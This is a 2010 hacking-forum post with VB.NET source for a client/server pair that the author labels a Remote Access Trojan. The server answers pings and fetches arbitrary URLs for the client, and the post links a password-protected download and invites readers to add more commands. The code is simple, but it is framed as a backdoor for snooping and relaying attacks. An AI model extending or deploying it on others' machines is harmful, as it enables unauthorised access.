Short for Remote Access Trojan, a Trojan horse that provides the intruder, or hacker, with a backdoor into the infected system. This backdoor allows the hacker to snoop your system, use your infected system to launch a zombie (attacks on other systems), or even run malicious code.
I decided to create such a program in vb8 Express Edition, to point out the power of .net library. I must say that my program (actually is a client/server pair) can be implemented in C# as well. In our days (for my opinion) the choice between C# and VB is not a dilemma any more. The underlying framework (the .net 2.0 - 3.5) resolve any difficulties.
About the server:
It listens at a specific port for a client command.
Available commands:
If the first letter of the packet send by the client is "1" then this is considered as a "ping" request. So, the server responses with a "IREM m here baby!"
If the first letter of the packet send by the client is "2" then this is considered as an HTTP request. So, the server access the specified page and send the web response to the client as an html page.
About the client:
Sends commands and receives responses from the server.
Available commands:
If the first letter of the packet send by the client is "1" then this is considered as a "ping" request
(i.e. The "R u there" checkbox must be checked! The server should answer with a "IREM m here baby!"
If the first letter of the packet send by the client is "2" then this is considered as an HTTP request. The server access the specified page and send the web response to the client as an html page. The page is displayed as html-text as well as html-look in the pages: Html-Response & Web Browser respectively.
You can download the full project, from
http://rapidshare.co...0212384/RAT.zip
Password: p0wnbox.com
The program uses .net framework 2.0 and above.
I have tested the server in Windows XP Pro (with .net 2.0) , Windows XPPro (with .net 3.5) and Windows 7 Home Premium. I have test the client in windows 7. The Client/Server pair have been tested in a LAN as well as in a virtual machine environment.
You can use this program by any mean you like, except for lammer (aka stupid) purposes. It is not necessary a reference to the author of the program or any other remark or any kind of laudation. This is a tutorial, so the scope is the knowledge and only the knowledge. Our "HowToBeFamous" dept has been closed, a long time ago...
I strongly suggest you to extend it to handle new commands. It is very easy!
I bet that you gonna use it for educational purposes ONLY.
Am i right?
Thnx... I appreciate!
PS: Any remarks and/or/xor suggestions would be greatly welcome...
The server code:
REM *********************************************************************
REM A simple remote access server.
REM It listens at a specific port for a client command.
REM Available commands:
REM 1. If the first letter of the packet send by the client is "1" then this is considered as a "ping" request.
REM So, the server responses with a "IREM m here baby!"
REM 2. If the first letter of the packet send by the client is "2" then this is considered as an HTTP request.
REM So, the server access the specified page and send the web response to the cient as an html page.
REM
REM © by Thiseas @ 04th Jan 2010 - SeiriosB@yahoo.gr
REM Greetz to p0wnbox team @ www.p0wnbox.com
REM
REM
REM REMARKS:
REM You can get this program and extend it to handle any commands you want.
REM I bet that you gonna use it for educational purposes ONLY. Am i right? <img src='http://www.governmentsecurity.org/forum/public/style_emoticons/<#EMO_DIR#>/wink.gif' class='bbc_emoticon' alt=';)' />
REM thx... I appreciate!
REM ****************************************************************************************************************
Imports System.Net.Sockets
Imports System.Net
Imports System.Text
Imports System.IO
Class TCPSrv
Const BUFFER_SIZE As Integer = 512
Shared Sub Main(ByVal args As String())
REM Must listen on correct port- must be same as port client wants to connect on.
Dim portNumber As Integer = 8000 REM My default port.
Dim serverIP As IPAddress = IPAddress.Parse("127.0.0.1") REM My default IP.
Dim i As Integer = 0
REM If arguments exist the use them overwriting the defaults.
While i < args.Length
Select Case args(i)
Case "/p" REM Port Flag parameter. If not entered, port 8000 will be used.
i += 1 REM Skip to the actual port parameter.
portNumber = Integer.Parse(args(i))
Case "/h" REM Hosts IP Flag parameter. If not entered, ip 127.0.0.1 will be used.
i += 1 REM Skip to the actual IP parameter.
serverIP = IPAddress.Parse(args(i))
End Select
i += 1 REM Skip to the next argument.
End While
Dim tcpListener As New TcpListener(serverIP, portNumber)
Try
While (1 = 1)
tcpListener.Start()
Console.WriteLine("Server is listening on {0}:{1}...", serverIP, portNumber)
REM Waiting for a client to be connected.
Dim tcpClient As TcpClient = tcpListener.AcceptTcpClient()
Console.WriteLine("Connection accepted.")
REM Get the stream
Dim networkStream As NetworkStream = tcpClient.GetStream()
REM Read the client command into an 8k buffer. It could not be greater <img src='http://www.governmentsecurity.org/forum/public/style_emoticons/<#EMO_DIR#>/wink.gif' class='bbc_emoticon' alt=';)' />
Dim bytes(8000) As Byte
networkStream.Read(bytes, 0, 8000)
REM Return the data received from the client to the console.
Dim clientdata As String = Encoding.ASCII.GetString(bytes)
Dim iPos As Integer = InStr(clientdata, Chr(0))
If iPos > 0 Then clientdata = Left(clientdata, iPos - 1)
REM Acccording to the packet (its 1st letter) send by the client we answer
If clientdata.Substring(0, 1) = "1" Then REM Command #1: R u Up request.
Dim responseString As String = "IREM m here baby!"
Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(responseString)
networkStream.Write(sendBytes, 0, sendBytes.Length)
ElseIf clientdata.Substring(0, 1) = "2" Then REM Command #2: A web request.
REM I consider the web request command as: "2http://www.google.com",
REM so, I send the command to the "gotoWeb" function w/o its first letter.
Dim sTheURL As String = clientdata.Substring(1, clientdata.Length - 1)
TCPSrv.gotoWeb(networkStream, sTheURL)
Else
REM Unhandled command request found!
Dim responseString As String = "Ops... I dont know this command!"
Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(responseString)
networkStream.Write(sendBytes, 0, sendBytes.Length)
End If
tcpClient.Close()
tcpListener.Stop()
End While
Catch e As Exception
REM A serious error occured. Display its description to the console.
Console.WriteLine(e.ToString())
Finally
tcpListener.Stop()
End Try
End Sub
REM ***************************************************************************************
REM This is a very simple function to access a web server (via HTTP), get the server response,
REM store this response to a string and send it via TCP to the client.
REM
Shared Sub gotoWeb(ByVal netStream As NetworkStream, ByVal sUrl As String)
Dim sendBytes As [Byte]()
Dim sWebHtmlResponse As String
Try
REM Create a REM WebRequestREM object with the specified url
Dim myWebRequest As WebRequest = WebRequest.Create(sUrl)
REM Send the REM WebRequestREM and wait for response.
Dim myWebResponse As WebResponse = myWebRequest.GetResponse()
Dim sPageEncoding As String = DirectCast(myWebResponse, System.Net.HttpWebResponse).CharacterSet
REM Call method REM GetResponseStreamREM to obtain stream associated with the response object
Dim ReceiveStream As Stream = myWebResponse.GetResponseStream()
REM If the operating system has the encoding of the web page then use it, otherwise use the default.
Dim encode As Encoding
Try
encode = System.Text.Encoding.GetEncoding(sPageEncoding)
Catch ex As Exception
encode = System.Text.Encoding.Default
End Try
REM Pipe the stream to a higher level stream reader with the required encoding format.
Dim readStream As New StreamReader(ReceiveStream, encode)
Dim read(256) As Char
REM Read 256 characters at a time.
Dim count As Integer = readStream.Read(read, 0, 256)
sWebHtmlResponse = ""
While count > 0
REM Dump the 256 characters on a string .
Dim str As New [String](read, 0, count)
sWebHtmlResponse += str
count = readStream.Read(read, 0, 256)
End While
REM Add a new line to the webResponse string.
sWebHtmlResponse += ControlChars.Lf + ControlChars.Cr
REM Release the resources of stream object.
readStream.Close()
REM Release the resources of response object.
myWebResponse.Close()
REM Send the Html Response to the client in UTF-8 format.
sendBytes = Encoding.UTF8.GetBytes(sWebHtmlResponse)
netStream.Write(sendBytes, 0, sendBytes.Length)
Catch ex As Exception
REM Ops! An error occur, inform the client about it!
sendBytes = Encoding.ASCII.GetBytes(ex.Message)
netStream.Write(sendBytes, 0, sendBytes.Length)
End Try
End Sub
End Class
..and the more important code fragment from the client:
REM *********************************************************************
REM A simple client.
REM It sends commands at a specific port at a specific address.
REM Available commands:
REM 1. If the first letter of the packet send by the client is "1" then this is considered as a "ping" request
REM (i.e. The "R u there" checkbox must be checked!
REM The server sould considered with a "IREM m here baby!"
REM 2. If the first letter of the packet send by the client is "2" then this is considered as an HTTP request.
REM The server access the specified page and send the web response to the cient as an html page.
REM The page is displyed as html-text as well as html-look in the pages: Html-Response & Web Browser respectively.
REM
REM © by Thiseas @ 04th Jan 2010 - SeiriosB@yahoo.gr
REM Greetz to p0wnbox team @ www.p0wnbox.com
REM
REM
REM REMARKS:
REM You can get this program and extend it to handle any commands you want.
REM I bet that you gonna use it for educational purposes ONLY. Am i right? <img src='http://www.governmentsecurity.org/forum/public/style_emoticons/<#EMO_DIR#>/wink.gif' class='bbc_emoticon' alt=';)' />
REM thx... I appreciate!
REM ****************************************************************************************************************Imports System.Net.Sockets
Imports System.Text
Imports System.IO
Public Class Form1
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim tcpClient As New System.Net.Sockets.TcpClient()
Dim sInformation As String
REM Clear the pages
RichTextBox1.Clear()
WebBrowser1.Navigate("about:blank")
REM Inform the user about the response time
sInformation = "Client Requests @ " + DateTime.Now.ToString
ListBox1.Items.Add(sInformation)
Try
tcpClient.Connect(TextBox_IP.Text, NumericUpDown_Port.Value)
Dim networkStream As Net.Sockets.NetworkStream = tcpClient.GetStream()
If networkStream.CanWrite And networkStream.CanRead Then
Dim sendBytes As [Byte]() = Nothing
Dim s As String
Dim i As Int32
Dim bytes(tcpClient.ReceiveBufferSize) As Byte
If CheckBox_handshake.Checked = True Then
sendBytes = Encoding.ASCII.GetBytes("1.Is anybody there?")
networkStream.Write(sendBytes, 0, sendBytes.Length)
REM Read the NetworkStream into a byte buffer.
networkStream.Read(bytes, 0, CInt(tcpClient.ReceiveBufferSize))
REM Output the data received from the host to the listbox.
s = Space(5) + Encoding.ASCII.GetString(bytes)
ListBox1.Items.Add(s)
sInformation = "Server Respond @ " + DateTime.Now.ToString
ListBox1.Items.Add(sInformation)
Else
REM Send the request to the server.
s = "2" + TextBox_URL.Text
sendBytes = Encoding.ASCII.GetBytes(s)
networkStream.Write(sendBytes, 0, sendBytes.Length)
REM Read the Packet: The HTML page.
REM Loop to receive all the data sent by the server.
s = ""
i = networkStream.Read(bytes, 0, bytes.Length)
While (i <> 0)
REM Translate data bytes to a UTF8 string.
s += System.Text.Encoding.UTF8.GetString(bytes, 0, i)
i = networkStream.Read(bytes, 0, bytes.Length)
End While
REM Inform the user about the response time
sInformation = "Server Respond @ " + DateTime.Now.ToString
ListBox1.Items.Add(sInformation)
REM Update the ritch-text with the HTML response.
RichTextBox1.Text = s
REM Write the HTML contents to a file and force browser to read it.
Using sw As StreamWriter = New StreamWriter("CurrentReadPage.htm", False, System.Text.Encoding.GetEncoding("UTF-8"))
sw.Write(s)
sw.Close()
End Using
Dim sCurrentFilePath As String = Environment.CurrentDirectory()
sCurrentFilePath += "\CurrentReadPage.htm"
WebBrowser1.Navigate(sCurrentFilePath)
End If
Else
If Not networkStream.CanRead Then
ListBox1.Items.Add("Fail to write data to the stream.")
ElseIf Not networkStream.CanWrite Then
ListBox1.Items.Add("Fail to read data from the stream.")
tcpClient.Close()
End If
End If
Catch ex As Exception
ListBox1.Items.Add(ex.Message)
End Try
End Sub
End Class
